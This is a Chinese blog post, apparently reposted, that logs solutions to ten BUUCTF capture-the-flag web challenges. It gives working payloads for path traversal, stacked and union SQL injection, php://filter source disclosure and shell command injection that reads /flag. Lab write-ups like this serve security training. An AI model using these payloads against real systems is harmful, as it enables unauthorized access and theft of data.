飞道的博客

2021-5-5 buu刷题记录

320人阅读  评论(0)

生活所迫,从头捡回来

第一题:

CTF-BUUCTF-[HCTF 2018]WarmUp

php代码审计题

四个if判断 只有最后一个走得通,就是把第二个?进行2次url加密
然后得到%253f 然后构造payload:file=source.php?file=source.php%253f../../../../../ffffllllaaaagggg
这样flag就出来了

第二题:

[极客大挑战 2019]EasySQL

万能密码直接出

第三题

[强网杯 2019]随便注

堆叠注入 很早之前写过的题了
最后就是word可以显示一串数字的表不能显示
然后rename把一串数字的表名改成word把原本的word改成其他的,最后1' or 1=1 #弄出来

1';rename tables `words` to `words1`;
rename tables `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);#
1' or 1=1 #

第四题

[极客大挑战 2019]Havefun

F12 然后?cat=dog

第五题

[SUCTF 2019]EasySQL

没过滤;有个特殊解法*,1
后端代码猜测是:

select $_GET['query'] || flag from flag


第六题:

[ACTF2020 新生赛]Include

Can you find out the flag?
就是那个把flag.php通过base64加密之后输出出来。

?file=php://filter/convert.base64-encode/resource=flag.php

然后去解密就是flag

第七题:

[极客大挑战 2019]Secret File

F12 跳转 抓包 secr3t.php

然后提示在flag.php里面
直接:file=php://filter/convert.base64-encode/resource=flag.php

第八题:

[极客大挑战 2019]LoveSQL

最简单的联合注入了,啥东西都没有

第九题:

[ACTF2020 新生赛]Exec

简单管道符 cat /flag

第十题:

[GXYCTF2019]Ping Ping Ping

?ip=127.0.0.1;cat$IFS$1`ls`

if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
   
    die("fxck your flag!");


转载:https://blog.csdn.net/kuller_Yan/article/details/116430651
查看评论
* 以上用户言论只代表其个人观点,不代表本网站的观点或立场